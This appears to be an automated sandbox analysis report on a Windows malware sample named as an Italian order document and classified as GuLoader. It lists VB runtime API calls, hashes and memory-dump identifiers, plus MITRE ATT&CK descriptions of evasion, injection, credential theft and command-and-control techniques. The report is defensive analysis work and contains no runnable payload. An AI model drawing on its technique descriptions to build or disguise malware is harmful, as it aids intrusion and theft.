__vbaFreeObj.MSVBVM60 ref: 0041EFE6
__vbaFreeVar.MSVBVM60 ref: 0041EFEF
__vbaFreeStr.MSVBVM60(0041F035), ref: 0041F025
__vbaFreeObj.MSVBVM60 ref: 0041F02E

Strings

Ynkmulslerneko, xrefs: 0041EF46

Memory Dump Source

Source File: 00000002.00000002.238038167140.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.238038120792.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.238038419710.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.238038485259.0000000000426000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$LateNew2$#512#554#613#716CallList
String ID: Ynkmulslerneko
API String ID: 3932479610-3209129563
Opcode ID: 511fc55fb95d1e30ea6352166064d55f1a24df680b7f00817924fc9d38f0429f
Instruction ID: 0e5fbc06c66a61cc13feb7b3be8fd85aed4b24f8d66214b59412ad5fb190163c
Opcode Fuzzy Hash: 511fc55fb95d1e30ea6352166064d55f1a24df680b7f00817924fc9d38f0429f
Instruction Fuzzy Hash: B7515175A00209AFCB14DF94DE89EDEBBB8FF48705F104529F542B32A0D7745986CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041EBE0, Relevance: 27.2, APIs: 18, Instructions: 156COMMON

Download Yara Rule

APIs

__vbaVarDup.MSVBVM60 ref: 0041EC37
#717.MSVBVM60(?,?,00000003,00000000), ref: 0041EC48
__vbaVarTstNe.MSVBVM60(?,?), ref: 0041EC64
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041EC77
#706.MSVBVM60(00000001,00000000,00000000), ref: 0041EC8D
__vbaStrMove.MSVBVM60 ref: 0041EC98
#554.MSVBVM60 ref: 0041EC9E
__vbaNew2.MSVBVM60(00402904,00423494), ref: 0041ECB6
__vbaHresultCheckObj.MSVBVM60(00000000,0226EB44,004028F4,00000014), ref: 0041ECE1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402914,00000110), ref: 0041ED0F
__vbaStrMove.MSVBVM60 ref: 0041ED1A
__vbaFreeObj.MSVBVM60 ref: 0041ED23
__vbaNew2.MSVBVM60(00402904,00423494), ref: 0041ED3B
__vbaHresultCheckObj.MSVBVM60(00000000,0226EB44,004028F4,0000004C), ref: 0041ED60
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029BC,0000002C), ref: 0041ED9F
__vbaFreeObj.MSVBVM60 ref: 0041EDA8
__vbaFreeStr.MSVBVM60(0041EDF0), ref: 0041EDE8
__vbaFreeStr.MSVBVM60 ref: 0041EDED

Memory Dump Source

Source File: 00000002.00000002.238038167140.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.238038120792.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.238038419710.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.238038485259.0000000000426000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$#554#706#717List
String ID:
API String ID: 1080988887-0
Opcode ID: b77ba6821eda705ec9d84e7a641bfd5a489aabecc7f039ebc54e70647c08910d
Instruction ID: fb7d85f21408a0e6260f8418227450407240ae3abad634d92004a90dc7fa318c
Opcode Fuzzy Hash: b77ba6821eda705ec9d84e7a641bfd5a489aabecc7f039ebc54e70647c08910d
Instruction Fuzzy Hash: 7351AF71A00219EFCB14DF95DE89EEEBBB8FF48304F10412AE505B72A0D7785945CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041E9E0, Relevance: 9.1, APIs: 6, Instructions: 70COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00401F48,00423010,?,?,?,?,?,?,?,00000618,004014A6), ref: 0041EA24
__vbaHresultCheckObj.MSVBVM60(00000000,00738440,0040259C,0000015C,?,?,?,?,?,?,?,00000618,004014A6), ref: 0041EA4C
__vbaNew2.MSVBVM60(00401F48,00423010,?,?,?,?,?,?,?,00000618,004014A6), ref: 0041EA65
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00000618,004014A6), ref: 0041EA7E
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004028D4,00000178,?,?,?,?,?,?,?,00000618,004014A6), ref: 0041EAA5
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00000618,004014A6), ref: 0041EAB4

Memory Dump Source

Source File: 00000002.00000002.238038167140.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.238038120792.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.238038419710.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.238038485259.0000000000426000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresultNew2$Free
String ID:
API String ID: 877497001-0
Opcode ID: c739f79b8b34166fe03c275f2f445eaa02473afb5cb6d6d3bffe0bb05a031976
Instruction ID: 690c78243f7cdd36269d283a1af073243fe848584c43811d7d9501bf1a146230
Opcode Fuzzy Hash: c739f79b8b34166fe03c275f2f445eaa02473afb5cb6d6d3bffe0bb05a031976
Instruction Fuzzy Hash: 8D217F78A40200ABC710DF55CD49FAA7BB8FF88741F644826F981F72A1D67859818BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041EAF0, Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00401F48,00423010,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004014A6), ref: 0041EB34
__vbaHresultCheckObj.MSVBVM60(00000000,00738440,0040259C,00000220), ref: 0041EB5F
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041EB6F
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004014A6), ref: 0041EB79
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004014A6,4202A27F), ref: 0041EB82
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004014A6,4202A27F), ref: 0041EB8B

Memory Dump Source

Source File: 00000002.00000002.238038167140.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.238038120792.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.238038419710.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.238038485259.0000000000426000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CallCheckHresultLateNew2
String ID:
API String ID: 369400049-0
Opcode ID: 9a281853ab97a633618956330f6ec073355df9e7248d6c9820aca11fe0eac67e
Instruction ID: cffffcc2ae7f5bd2401fc031d03621fe9e20f9460b1c0c7113104e63c4737f48
Opcode Fuzzy Hash: 9a281853ab97a633618956330f6ec073355df9e7248d6c9820aca11fe0eac67e
Instruction Fuzzy Hash: 54118F74900214BBCB10DF95DE8DE9EBBB8FF48B05F10046AF482B31A0D7786641CBA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ORDINE + DDT A.M.F SpA.exe PID: 8108 Parent PID: 4632 ORDINE + DDT A.M.F SpA.exeCOMMON

Executed Functions

Function 0056D6B9, Relevance: 1.6, APIs: 1, Instructions: 137threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(-10664DAE,-0000000178E7204E), ref: 0056D7CF

Memory Dump Source

Source File: 00000008.00000002.242863659625.000000000056D000.00000040.00000001.sdmp, Offset: 0056D000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 1c19aba1ae88beae4517ed82db7d0d1a78e36f845514dbd98da04f4a968b03cb
Instruction ID: e0920a04ade3e77712b3e90724d7df268cdcb13a435f6530b8c6545515b8bcb2
Opcode Fuzzy Hash: 1c19aba1ae88beae4517ed82db7d0d1a78e36f845514dbd98da04f4a968b03cb
Instruction Fuzzy Hash: B3416E74A04345CFDB248F14C899BA17FB5FF96318F5496A9C4090F2A6CB71C986CB63

Uniqueness

Uniqueness Score: -1.00%

Function 0056D6C6, Relevance: 1.6, APIs: 1, Instructions: 115threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(-10664DAE,-0000000178E7204E), ref: 0056D7CF

Memory Dump Source

Source File: 00000008.00000002.242863659625.000000000056D000.00000040.00000001.sdmp, Offset: 0056D000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: a735b9573bd35f7f43c3c833e87b017c2a66711b83ce6406ca741bb3e97c73f2
Instruction ID: 02094e639354c332fcc496b0e33e886e39658699b422162f676d914cfb8c0c94
Opcode Fuzzy Hash: a735b9573bd35f7f43c3c833e87b017c2a66711b83ce6406ca741bb3e97c73f2
Instruction Fuzzy Hash: 0F414A74A04345CFDB248F14C899BA17FB2FF56318F499699C4090F2AACB708986CB63

Uniqueness

Uniqueness Score: -1.00%

Function 0056D729, Relevance: 1.6, APIs: 1, Instructions: 105threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(-10664DAE,-0000000178E7204E), ref: 0056D7CF

Memory Dump Source

Source File: 00000008.00000002.242863659625.000000000056D000.00000040.00000001.sdmp, Offset: 0056D000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 93e90ed96db0e149397167c54beb0823c3ecec1ff0d4014a198755abd37cf9c7
Instruction ID: 47fd56b1f58b3ba16f88b833d928ef2659fa83d648b252a0b385ce0e6d3f26ce
Opcode Fuzzy Hash: 93e90ed96db0e149397167c54beb0823c3ecec1ff0d4014a198755abd37cf9c7
Instruction Fuzzy Hash: 3E312B34A04345CFDB248F14C899BA07FA2FF56359F599699C4090F2A6CB708D46CBA3

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report ORDINE + DDT A.M.F SpA.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph